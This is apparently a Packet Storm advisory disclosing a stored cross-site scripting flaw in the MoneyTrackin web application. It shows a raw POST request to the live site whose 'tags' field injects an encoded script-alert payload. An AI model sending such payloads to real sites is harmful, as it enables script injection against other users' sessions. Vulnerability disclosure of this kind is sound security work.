MoneyTrackin Web Application suffers from a persistent cross site scripting vulnerability.
6402aae158ad1102885aef5e05fc5dcb6d5bd711801b982df72a5e5137bc6f0c# Exploit Title: MoneyTrackin Web Application - Stored Cross-Site Scripting (XSS)
# Date: 6/24/16
# Exploit Author: Brett DeWall
# Exploit Author Twitter: @xbadbiddyx
# Exploit Author Blog: http://xbadbiddyx.tumblr.com
# Vendor Homepage: https://www.moneytrackin.com/
# Version: Latest commit
# Contacted Vendor Date: 6/18/16
### Vulnerable Request
Request
POST /accounting/create_transaction/?project=NULL HTTP/1.1
Host: www.moneytrackin.com
project=NULL&description=Vuln-Test&amount=1000&date=17%2F06%2F2016&tags=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&sent=1&clientDate=2016-06-17&oldproject=NULL
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed